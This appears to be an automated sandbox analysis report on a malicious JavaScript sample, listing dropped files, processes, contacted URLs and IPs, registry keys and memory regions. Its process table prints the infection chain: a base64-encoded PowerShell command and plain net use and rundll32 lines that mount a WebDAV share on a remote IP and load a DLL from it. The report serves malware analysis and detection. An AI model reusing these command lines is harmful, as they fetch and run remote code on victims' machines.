Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
212481723992301695.js
|
ASCII text, with very long lines (65536), with no line terminators
|
initial sample
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage user DataBase, version 0x620, checksum 0x7755ad4e, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_et224qok.zih.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbg0jaaa.fyl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\212481723992301695.js"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMgA0ADAAOAAxADgANQAxADAANQAyADQAMQAuAGQAbABsACwARQBuAHQAcgB5AA==
|
||
C:\Windows\System32\rundll32.exe
|
"C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\2408185105241.dll,Entry
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\net.exe
|
"C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\
|
||
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://94.159.113.48:8888/U
|
unknown
|
||
https://g.live.com/odclientsettings/ProdV21C:
|
unknown
|
||
http://94.159.113.48:8888/2
|
unknown
|
||
http://94.159.113.48:8888/R
|
unknown
|
||
http://crl.ver)
|
unknown
|
||
https://g.live.com/odclientsettings/Prod1C:
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
http://94.159.113.48:8888/sacef
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
http://94.159.113.48:8888/
|
unknown
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
ax-0001.ax-dc-msedge.net
|
150.171.29.10
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
94.159.113.48
|
unknown
|
Russian Federation
|
||
127.0.0.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1D300158000
|
trusted library allocation
|
page read and write
|
||
1F7C9201000
|
trusted library allocation
|
page read and write
|
||
EFFF2FD000
|
stack
|
page read and write
|
||
1F7C887C000
|
heap
|
page read and write
|
||
1C838529000
|
heap
|
page read and write
|
||
1C83A23A000
|
heap
|
page read and write
|
||
1D3752E0000
|
trusted library allocation
|
page read and write
|
||
EFFF4FC000
|
stack
|
page read and write
|
||
1D3759B0000
|
heap
|
page read and write
|
||
EFFEF7E000
|
stack
|
page read and write
|
||
1D300506000
|
trusted library allocation
|
page read and write
|
||
7FFD33C40000
|
trusted library allocation
|
page read and write
|
||
1F7CDE1F000
|
heap
|
page read and write
|
||
1D3739A0000
|
heap
|
page read and write
|
||
1C83A203000
|
heap
|
page read and write
|
||
1C8385B0000
|
heap
|
page read and write
|
||
1D3739FE000
|
heap
|
page read and write
|
||
BE0DBFE000
|
stack
|
page read and write
|
||
FCCC97A000
|
stack
|
page read and write
|
||
1D30015D000
|
trusted library allocation
|
page read and write
|
||
1C83A242000
|
heap
|
page read and write
|
||
1D3752C0000
|
trusted library allocation
|
page read and write
|
||
7FFD33D20000
|
trusted library allocation
|
page read and write
|
||
1F7CDDA0000
|
trusted library allocation
|
page read and write
|
||
1C839D90000
|
heap
|
page read and write
|
||
7FFD33C60000
|
trusted library allocation
|
page read and write
|
||
EFFF0FA000
|
stack
|
page read and write
|
||
1C83A22E000
|
heap
|
page read and write
|
||
2C50A5EA000
|
heap
|
page read and write
|
||
1C838531000
|
heap
|
page read and write
|
||
1D300117000
|
trusted library allocation
|
page read and write
|
||
1F7C9810000
|
trusted library section
|
page readonly
|
||
1C83A249000
|
heap
|
page read and write
|
||
1F7C9BE0000
|
trusted library allocation
|
page read and write
|
||
7FFD33D10000
|
trusted library allocation
|
page read and write
|
||
1F7CDEC6000
|
heap
|
page read and write
|
||
1C83A1FF000
|
heap
|
page read and write
|
||
1C83A1FF000
|
heap
|
page read and write
|
||
1C83A34D000
|
heap
|
page read and write
|
||
1C838548000
|
heap
|
page read and write
|
||
1C83A2F0000
|
heap
|
page read and write
|
||
1D373A09000
|
heap
|
page read and write
|
||
BE0DDFB000
|
stack
|
page read and write
|
||
1D375A05000
|
heap
|
page read and write
|
||
2C50DA33000
|
heap
|
page read and write
|
||
2C50A550000
|
heap
|
page read and write
|
||
1F7CDDD0000
|
trusted library allocation
|
page read and write
|
||
1F7CDC71000
|
trusted library allocation
|
page read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
1F7CDF0A000
|
heap
|
page read and write
|
||
1F7C9100000
|
heap
|
page read and write
|
||
1F7CDE40000
|
heap
|
page read and write
|
||
1BE3E8B0000
|
heap
|
page read and write
|
||
EFFDDFE000
|
unkown
|
page readonly
|
||
7FFD33D50000
|
trusted library allocation
|
page read and write
|
||
1F7CDDC0000
|
trusted library allocation
|
page read and write
|
||
1C83A201000
|
heap
|
page read and write
|
||
1F7C9102000
|
heap
|
page read and write
|
||
1C838548000
|
heap
|
page read and write
|
||
1C838530000
|
heap
|
page read and write
|
||
1F7C9830000
|
trusted library section
|
page readonly
|
||
EFFDBFE000
|
unkown
|
page readonly
|
||
7DF418420000
|
trusted library allocation
|
page execute and read and write
|
||
EFFEFFE000
|
unkown
|
page readonly
|
||
1F7C9840000
|
trusted library section
|
page readonly
|
||
7FFD33AF6000
|
trusted library allocation
|
page read and write
|
||
1D375280000
|
heap
|
page read and write
|
||
1F7CDDF0000
|
remote allocation
|
page read and write
|
||
1C83A2F1000
|
heap
|
page read and write
|
||
1D3759AE000
|
heap
|
page read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
1C83A1E1000
|
heap
|
page read and write
|
||
1F7CDF0C000
|
heap
|
page read and write
|
||
1F7C882A000
|
heap
|
page read and write
|
||
1D300063000
|
trusted library allocation
|
page read and write
|
||
1F7C88A0000
|
heap
|
page read and write
|
||
1C83A1FF000
|
heap
|
page read and write
|
||
1D373A47000
|
heap
|
page read and write
|
||
BE0D2F5000
|
stack
|
page read and write
|
||
EFFE0F9000
|
stack
|
page read and write
|
||
1F7CDEF7000
|
heap
|
page read and write
|
||
7FFD33CA0000
|
trusted library allocation
|
page read and write
|
||
1BE3E936000
|
heap
|
page read and write
|
||
1F7CDE60000
|
heap
|
page read and write
|
||
7FFD33B60000
|
trusted library allocation
|
page execute and read and write
|
||
1F7CDE8F000
|
heap
|
page read and write
|
||
1D375970000
|
heap
|
page read and write
|
||
7FFD33A50000
|
trusted library allocation
|
page read and write
|
||
1F7C888E000
|
heap
|
page read and write
|
||
1C83A1FF000
|
heap
|
page read and write
|
||
1F7C87D0000
|
trusted library section
|
page read and write
|
||
7FFD33CC0000
|
trusted library allocation
|
page read and write
|
||
1D310001000
|
trusted library allocation
|
page read and write
|
||
2C50A5F3000
|
heap
|
page read and write
|
||
1D375450000
|
heap
|
page read and write
|
||
1C83A226000
|
heap
|
page read and write
|
||
8B0E27E000
|
stack
|
page read and write
|
||
7FFD33C70000
|
trusted library allocation
|
page read and write
|
||
1D3753C6000
|
heap
|
page execute and read and write
|
||
7FFD33B26000
|
trusted library allocation
|
page execute and read and write
|
||
848E8FD000
|
stack
|
page read and write
|
||
1F7C9015000
|
heap
|
page read and write
|
||
1D3003CE000
|
trusted library allocation
|
page read and write
|
||
1D373A45000
|
heap
|
page read and write
|
||
848EDBE000
|
stack
|
page read and write
|
||
BE0D4FE000
|
stack
|
page read and write
|
||
1D373A1E000
|
heap
|
page read and write
|
||
1C838513000
|
heap
|
page read and write
|
||
1D3003E6000
|
trusted library allocation
|
page read and write
|
||
EFFE67E000
|
stack
|
page read and write
|
||
EFFECFE000
|
unkown
|
page readonly
|
||
1F7C9730000
|
trusted library allocation
|
page read and write
|
||
1F7C8894000
|
heap
|
page read and write
|
||
1F7C9113000
|
heap
|
page read and write
|
||
7FFD33D00000
|
trusted library allocation
|
page read and write
|
||
2C50A5F3000
|
heap
|
page read and write
|
||
1C83853E000
|
heap
|
page read and write
|
||
FCCCC7E000
|
stack
|
page read and write
|
||
7FFD33C80000
|
trusted library allocation
|
page read and write
|
||
1F7CDF0E000
|
heap
|
page read and write
|
||
1D3004AC000
|
trusted library allocation
|
page read and write
|
||
BE0D6FE000
|
stack
|
page read and write
|
||
2C50A5E7000
|
heap
|
page read and write
|
||
1C83A1E6000
|
heap
|
page read and write
|
||
1C838548000
|
heap
|
page read and write
|
||
7FFD33C50000
|
trusted library allocation
|
page read and write
|
||
EFFE4FB000
|
stack
|
page read and write
|
||
1F7C8800000
|
heap
|
page read and write
|
||
1C8385BD000
|
heap
|
page read and write
|
||
8B0DFDE000
|
stack
|
page read and write
|
||
EFFE1FE000
|
unkown
|
page readonly
|
||
1C83A1E7000
|
heap
|
page read and write
|
||
1C83A1E0000
|
heap
|
page read and write
|
||
1C83852F000
|
heap
|
page read and write
|
||
1C83A206000
|
heap
|
page read and write
|
||
7FFD33D60000
|
trusted library allocation
|
page read and write
|
||
7FFD33CE0000
|
trusted library allocation
|
page read and write
|
||
1D310073000
|
trusted library allocation
|
page read and write
|
||
2C50DA30000
|
heap
|
page read and write
|
||
7FFD33AFC000
|
trusted library allocation
|
page execute and read and write
|
||
1F7CDE55000
|
heap
|
page read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
2C50A5D0000
|
heap
|
page read and write
|
||
1C8385B9000
|
heap
|
page read and write
|
||
1F7CDE8D000
|
heap
|
page read and write
|
||
1D375960000
|
heap
|
page execute and read and write
|
||
1F7CDF02000
|
heap
|
page read and write
|
||
2C50A530000
|
heap
|
page read and write
|
||
2C50A8CB000
|
heap
|
page read and write
|
||
1C83A34D000
|
heap
|
page read and write
|
||
1F7CDD40000
|
trusted library allocation
|
page read and write
|
||
1F7C8929000
|
heap
|
page read and write
|
||
1C838548000
|
heap
|
page read and write
|
||
7FFD33A4D000
|
trusted library allocation
|
page execute and read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
2C50A5EA000
|
heap
|
page read and write
|
||
1BE3E935000
|
heap
|
page read and write
|
||
1C83A1E2000
|
heap
|
page read and write
|
||
848E673000
|
stack
|
page read and write
|
||
1D300090000
|
trusted library allocation
|
page read and write
|
||
2C50A5D8000
|
heap
|
page read and write
|
||
EFFF5FE000
|
unkown
|
page readonly
|
||
848E97E000
|
stack
|
page read and write
|
||
1D375A90000
|
heap
|
page read and write
|
||
1F7C8873000
|
heap
|
page read and write
|
||
EFFE7FE000
|
unkown
|
page readonly
|
||
1F7CDBE0000
|
trusted library allocation
|
page read and write
|
||
1D373890000
|
heap
|
page read and write
|
||
1D373A00000
|
heap
|
page read and write
|
||
1D375A3D000
|
heap
|
page read and write
|
||
1C83A21E000
|
heap
|
page read and write
|
||
EFFF97E000
|
stack
|
page read and write
|
||
7FFD33A44000
|
trusted library allocation
|
page read and write
|
||
848EF3B000
|
stack
|
page read and write
|
||
1D310011000
|
trusted library allocation
|
page read and write
|
||
BE0D7FF000
|
stack
|
page read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
EFFEEFE000
|
unkown
|
page readonly
|
||
1C83A201000
|
heap
|
page read and write
|
||
1C83A1EB000
|
heap
|
page read and write
|
||
1F7C86B0000
|
heap
|
page read and write
|
||
848E87E000
|
stack
|
page read and write
|
||
EFFEBFE000
|
unkown
|
page readonly
|
||
1F7CDF0F000
|
heap
|
page read and write
|
||
1C838548000
|
heap
|
page read and write
|
||
EFFE77E000
|
stack
|
page read and write
|
||
7FFD33C10000
|
trusted library allocation
|
page execute and read and write
|
||
1BE3E8B4000
|
heap
|
page read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
EFFEA7E000
|
stack
|
page read and write
|
||
1F7CDEB2000
|
heap
|
page read and write
|
||
1F7C9BB1000
|
trusted library allocation
|
page read and write
|
||
1BE3E850000
|
heap
|
page read and write
|
||
848EBB6000
|
stack
|
page read and write
|
||
1C8384CC000
|
heap
|
page read and write
|
||
1F7C9000000
|
heap
|
page read and write
|
||
1F7CDE4D000
|
heap
|
page read and write
|
||
2C50DA40000
|
trusted library allocation
|
page read and write
|
||
1C838532000
|
heap
|
page read and write
|
||
1F7CDC70000
|
trusted library allocation
|
page read and write
|
||
7FFD33AF0000
|
trusted library allocation
|
page read and write
|
||
1D3753C0000
|
heap
|
page execute and read and write
|
||
1F7C88BD000
|
heap
|
page read and write
|
||
1C83A201000
|
heap
|
page read and write
|
||
1C83A1E6000
|
heap
|
page read and write
|
||
1D373A0D000
|
heap
|
page read and write
|
||
1F7C8890000
|
heap
|
page read and write
|
||
1F7C8690000
|
heap
|
page read and write
|
||
848E77E000
|
stack
|
page read and write
|
||
1F7CDEFB000
|
heap
|
page read and write
|
||
EFFDEFE000
|
stack
|
page read and write
|
||
1BE3E908000
|
heap
|
page read and write
|
||
1F7CDE2C000
|
heap
|
page read and write
|
||
1BE3E92D000
|
heap
|
page read and write
|
||
EFFE8FE000
|
unkown
|
page readonly
|
||
1BE3E939000
|
heap
|
page read and write
|
||
1F7CDC50000
|
trusted library allocation
|
page read and write
|
||
1BE3E8D0000
|
remote allocation
|
page read and write
|
||
1D373A4A000
|
heap
|
page read and write
|
||
1F7C8902000
|
heap
|
page read and write
|
||
EFFEAFE000
|
unkown
|
page readonly
|
||
1D375930000
|
heap
|
page execute and read and write
|
||
1C83852D000
|
heap
|
page read and write
|
||
848E7FE000
|
stack
|
page read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
1D375455000
|
heap
|
page read and write
|
||
1F7C8790000
|
heap
|
page read and write
|
||
1F7C9850000
|
trusted library section
|
page readonly
|
||
1D3739A5000
|
heap
|
page read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
EFFDB7E000
|
stack
|
page read and write
|
||
1C83851B000
|
heap
|
page read and write
|
||
EFFEB7E000
|
stack
|
page read and write
|
||
1D375D50000
|
heap
|
page read and write
|
||
1F7CDED0000
|
heap
|
page read and write
|
||
1C83A20E000
|
heap
|
page read and write
|
||
1C838533000
|
heap
|
page read and write
|
||
1C83A203000
|
heap
|
page read and write
|
||
2C50A605000
|
heap
|
page read and write
|
||
EFFDA7E000
|
stack
|
page read and write
|
||
7FFD33B00000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD33CD0000
|
trusted library allocation
|
page read and write
|
||
1C83A203000
|
heap
|
page read and write
|
||
1C83A229000
|
heap
|
page read and write
|
||
1BE3E8D0000
|
remote allocation
|
page read and write
|
||
1BE3E969000
|
heap
|
page read and write
|
||
1D31000F000
|
trusted library allocation
|
page read and write
|
||
1C83A229000
|
heap
|
page read and write
|
||
EFFE3FE000
|
unkown
|
page readonly
|
||
1F7CDBF0000
|
trusted library allocation
|
page read and write
|
||
1F7C911A000
|
heap
|
page read and write
|
||
7FFD33BFA000
|
trusted library allocation
|
page read and write
|
||
1D375300000
|
heap
|
page readonly
|
||
1C83A1FB000
|
heap
|
page read and write
|
||
1BE3E870000
|
heap
|
page read and write
|
||
1C838534000
|
heap
|
page read and write
|
||
7FFD33D30000
|
trusted library allocation
|
page read and write
|
||
1F7C887A000
|
heap
|
page read and write
|
||
EFFE87E000
|
stack
|
page read and write
|
||
1C838548000
|
heap
|
page read and write
|
||
1D30001B000
|
trusted library allocation
|
page read and write
|
||
BE0DAFE000
|
stack
|
page read and write
|
||
1BE3E95B000
|
heap
|
page read and write
|
||
1D300113000
|
trusted library allocation
|
page read and write
|
||
EFFE5FE000
|
unkown
|
page readonly
|
||
1D373ABD000
|
heap
|
page read and write
|
||
EFFD76B000
|
stack
|
page read and write
|
||
1D373970000
|
heap
|
page read and write
|
||
1F7CDDF0000
|
remote allocation
|
page read and write
|
||
1F7C9820000
|
trusted library section
|
page readonly
|
||
1C83A1E3000
|
heap
|
page read and write
|
||
1F7CDCB0000
|
trusted library allocation
|
page read and write
|
||
1F7CDCA0000
|
trusted library allocation
|
page read and write
|
||
1F7C911A000
|
heap
|
page read and write
|
||
1F7CF000000
|
heap
|
page read and write
|
||
1C8384CC000
|
heap
|
page read and write
|
||
1F7C885B000
|
heap
|
page read and write
|
||
BE0D9FF000
|
stack
|
page read and write
|
||
1BE3E96F000
|
heap
|
page read and write
|
||
1F7CDC90000
|
trusted library allocation
|
page read and write
|
||
1F7CDC70000
|
trusted library allocation
|
page read and write
|
||
1F7C8913000
|
heap
|
page read and write
|
||
EFFEC7E000
|
stack
|
page read and write
|
||
EFFDFFE000
|
unkown
|
page readonly
|
||
1F7CDF05000
|
heap
|
page read and write
|
||
1F7CDDC0000
|
trusted library allocation
|
page read and write
|
||
EFFDCF7000
|
stack
|
page read and write
|
||
848EB3E000
|
stack
|
page read and write
|
||
1F7C9002000
|
heap
|
page read and write
|
||
2C50A5F4000
|
heap
|
page read and write
|
||
EFFE97E000
|
stack
|
page read and write
|
||
848EC38000
|
stack
|
page read and write
|
||
7FFD33BE0000
|
trusted library allocation
|
page read and write
|
||
2C50A600000
|
heap
|
page read and write
|
||
1D375A3A000
|
heap
|
page read and write
|
||
1F7CDDB0000
|
trusted library allocation
|
page read and write
|
||
2C50A8C0000
|
heap
|
page read and write
|
||
7FFD33C30000
|
trusted library allocation
|
page execute and read and write
|
||
1C83A249000
|
heap
|
page read and write
|
||
1BE3E900000
|
heap
|
page read and write
|
||
1F7CDE00000
|
heap
|
page read and write
|
||
1C838531000
|
heap
|
page read and write
|
||
848ECBE000
|
stack
|
page read and write
|
||
EFFE9FE000
|
unkown
|
page readonly
|
||
7FFD33D40000
|
trusted library allocation
|
page read and write
|
||
1D373AC0000
|
heap
|
page read and write
|
||
1F7CDCCE000
|
trusted library allocation
|
page read and write
|
||
EFFF1FE000
|
unkown
|
page readonly
|
||
1F7C8840000
|
heap
|
page read and write
|
||
1C8385BB000
|
heap
|
page read and write
|
||
1D300538000
|
trusted library allocation
|
page read and write
|
||
1F7C88FF000
|
heap
|
page read and write
|
||
848EE3F000
|
stack
|
page read and write
|
||
1F7CDC60000
|
trusted library allocation
|
page read and write
|
||
7FFD33C90000
|
trusted library allocation
|
page read and write
|
||
1F7CDDF0000
|
remote allocation
|
page read and write
|
||
2C50A520000
|
heap
|
page read and write
|
||
EFFEDFE000
|
stack
|
page read and write
|
||
1C83A1E6000
|
heap
|
page read and write
|
||
1F7CDEEB000
|
heap
|
page read and write
|
||
1BE3E956000
|
heap
|
page read and write
|
||
1C83A299000
|
heap
|
page read and write
|
||
1C8384D8000
|
heap
|
page read and write
|
||
1C83853D000
|
heap
|
page read and write
|
||
848ED3E000
|
stack
|
page read and write
|
||
1C838550000
|
heap
|
page read and write
|
||
EFFDAFE000
|
unkown
|
page readonly
|
||
FCCC9FE000
|
stack
|
page read and write
|
||
1C838430000
|
heap
|
page read and write
|
||
1C83A229000
|
heap
|
page read and write
|
||
1D3739D2000
|
heap
|
page read and write
|
||
EFFE2FC000
|
stack
|
page read and write
|
||
1F7CDEC8000
|
heap
|
page read and write
|
||
1F7C8878000
|
heap
|
page read and write
|
||
EFFE6FE000
|
unkown
|
page readonly
|
||
7FFD33A43000
|
trusted library allocation
|
page execute and read and write
|
||
1C838526000
|
heap
|
page read and write
|
||
7FFD33C00000
|
trusted library allocation
|
page execute and read and write
|
||
1F7C9860000
|
trusted library section
|
page readonly
|
||
7FFD33A42000
|
trusted library allocation
|
page read and write
|
||
7FFD33C22000
|
trusted library allocation
|
page read and write
|
||
848EEBE000
|
stack
|
page read and write
|
||
1C838479000
|
heap
|
page read and write
|
||
EFFF3FE000
|
unkown
|
page readonly
|
||
1C838350000
|
heap
|
page read and write
|
||
EFFF9FE000
|
unkown
|
page readonly
|
||
1C83851E000
|
heap
|
page read and write
|
||
1D3739C0000
|
heap
|
page read and write
|
||
1C83A1FF000
|
heap
|
page read and write
|
||
1D300001000
|
trusted library allocation
|
page read and write
|
||
1F7CDCA0000
|
trusted library allocation
|
page read and write
|
||
1C8385BE000
|
heap
|
page read and write
|
||
1F7C87C0000
|
trusted library allocation
|
page read and write
|
||
1C83A211000
|
heap
|
page read and write
|
||
1BE3E8D0000
|
remote allocation
|
page read and write
|
||
1C8385B9000
|
heap
|
page read and write
|
||
1C83A203000
|
heap
|
page read and write
|
||
7FFD33CF0000
|
trusted library allocation
|
page read and write
|
||
1D375A58000
|
heap
|
page read and write
|
||
1F7CDE62000
|
heap
|
page read and write
|
||
1C83A1E5000
|
heap
|
page read and write
|
||
1BE3E935000
|
heap
|
page read and write
|
||
1F7CDD50000
|
trusted library allocation
|
page read and write
|
||
1D300110000
|
trusted library allocation
|
page read and write
|
||
1F7CDF00000
|
heap
|
page read and write
|
||
1F7CDD40000
|
trusted library allocation
|
page read and write
|
||
848E6FE000
|
stack
|
page read and write
|
||
1C838478000
|
heap
|
page read and write
|
||
7FFD33CB0000
|
trusted library allocation
|
page read and write
|
||
1D3752F0000
|
heap
|
page read and write
|
||
1D300103000
|
trusted library allocation
|
page read and write
|
||
1F7CDEEF000
|
heap
|
page read and write
|
||
1F7CDE5B000
|
heap
|
page read and write
|
||
1F7CDCB4000
|
trusted library allocation
|
page read and write
|
||
8B0E37E000
|
stack
|
page read and write
|
||
1C8385B5000
|
heap
|
page read and write
|
||
1C838450000
|
heap
|
page read and write
|
||
2C50A8A0000
|
heap
|
page read and write
|
||
8B0E2FC000
|
stack
|
page read and write
|
||
1D300023000
|
trusted library allocation
|
page read and write
|
||
BE0D3FE000
|
stack
|
page read and write
|
||
848EA7E000
|
stack
|
page read and write
|
||
1C83851E000
|
heap
|
page read and write
|
||
BE0D8FF000
|
stack
|
page read and write
|
||
1F7C9540000
|
trusted library allocation
|
page read and write
|
||
848EAF9000
|
stack
|
page read and write
|
||
1C838491000
|
heap
|
page read and write
|
||
1C838548000
|
heap
|
page read and write
|
||
2C50A5F3000
|
heap
|
page read and write
|
||
2C50D910000
|
heap
|
page read and write
|
||
7FFD33BF1000
|
trusted library allocation
|
page read and write
|
||
1C8385BD000
|
heap
|
page read and write
|
||
1BE3E840000
|
heap
|
page read and write
|
||
8B0DF5B000
|
stack
|
page read and write
|
||
848E9FE000
|
stack
|
page read and write
|
||
1C83A1E6000
|
heap
|
page read and write
|
||
2C50A5EE000
|
heap
|
page read and write
|
||
1F7C8813000
|
heap
|
page read and write
|
||
848ECB8000
|
stack
|
page read and write
|
||
2C50A8C4000
|
heap
|
page read and write
|
||
1C83A1F3000
|
heap
|
page read and write
|
||
1D375380000
|
trusted library allocation
|
page read and write
|
There are 392 hidden memdumps, click here to show them.